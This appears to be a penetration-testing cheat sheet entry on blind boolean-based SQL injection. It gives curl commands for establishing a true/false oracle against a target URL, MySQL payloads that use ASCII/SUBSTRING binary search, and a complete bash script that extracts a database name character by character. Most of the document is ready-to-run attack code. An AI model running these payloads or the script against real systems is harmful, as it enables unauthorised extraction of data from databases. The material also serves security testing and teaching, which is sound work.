
Blind Boolean-Based SQL Injection

CWE: CWE-89
Tools: sqlmap, ghauri
Difficulty: 🔴 advanced

Blind Extraction -- Boolean-Based

Boolean-based blind injection extracts data one bit at a time: each request appends a true/false condition to the query and the attacker observes whether the response matches the known-true baseline. Use it when query results are never reflected in the page but a true and a false condition still produce a reliably different response (body length, a marker string, a status code). If nothing observable differs between the two, there is no boolean oracle and a time-based technique is needed instead.

Establish the Oracle

# True response (save the body; note its length or a marker string that only appears here)
# -G with --data-urlencode sends the payload as a properly encoded query parameter instead of a raw space in the URL
curl -s -G "https://target.com/api" --data-urlencode "id=1 AND 1=1" -o true_response.txt

# False response
curl -s -G "https://target.com/api" --data-urlencode "id=1 AND 1=2" -o false_response.txt

# Compare: any stable difference between the two is the oracle. Repeat both requests a
# couple of times first so that dynamic content (timestamps, CSRF tokens) is not mistaken for the signal.
diff true_response.txt false_response.txt

Extract Data Character by Character

Use binary search on the character's ASCII value so that each character costs about seven requests instead of one per candidate:

-- Is the first character of the database name > 'm' (ASCII 109)?
-- Comparing strings directly is collation-dependent (MySQL's default collations are case-insensitive), so prefer the ASCII() form below.
' AND SUBSTRING(DATABASE(),1,1)>'m'-- -

-- Binary search approach (MySQL). Note the trailing "-- -": MySQL only treats "--" as a comment when it is followed by whitespace,
-- and a bare trailing space is easily lost in a URL, so the extra "-" keeps the comment valid.
' AND ASCII(SUBSTRING(DATABASE(),1,1))>64-- -    -- Greater than '@'?  (if true, ask the next one)
' AND ASCII(SUBSTRING(DATABASE(),1,1))>96-- -    -- Greater than '`'?  (if true, ask the next one)
' AND ASCII(SUBSTRING(DATABASE(),1,1))>112-- -   -- Greater than 'p'?  (if false, the value is in 97..112)
' AND ASCII(SUBSTRING(DATABASE(),1,1))>104-- -   -- Greater than 'h'?
-- Each answer halves the remaining range; continue until the exact character is identified

Automated Extraction Pattern

#!/bin/bash
# Extract the database name character by character.
# This is the simple linear scan (up to 95 requests per character); the binary search
# above needs about seven. BASE and MARKER are placeholders: MARKER must be a string
# that appears only in the true response established earlier.
BASE="https://target.com/api"
MARKER="expected_pattern"
extracted=""
for pos in $(seq 1 20); do
  found=0
  for char in $(seq 32 126); do
    # -G with --data-urlencode encodes the quote, spaces and parentheses in the payload
    response=$(curl -s -G "$BASE" --data-urlencode "id=1' AND ASCII(SUBSTRING(DATABASE(),$pos,1))=$char-- -")
    if echo "$response" | grep -q "$MARKER"; then
      c=$(printf "\\x$(printf '%02x' "$char")")
      extracted="${extracted}${c}"
      echo "Position $pos: $c | Full: $extracted"
      found=1
      break
    fi
  done
  # No printable character matched at this position: we have run past the end of the name
  [ "$found" -eq 0 ] && break
done
echo "Database name: $extracted"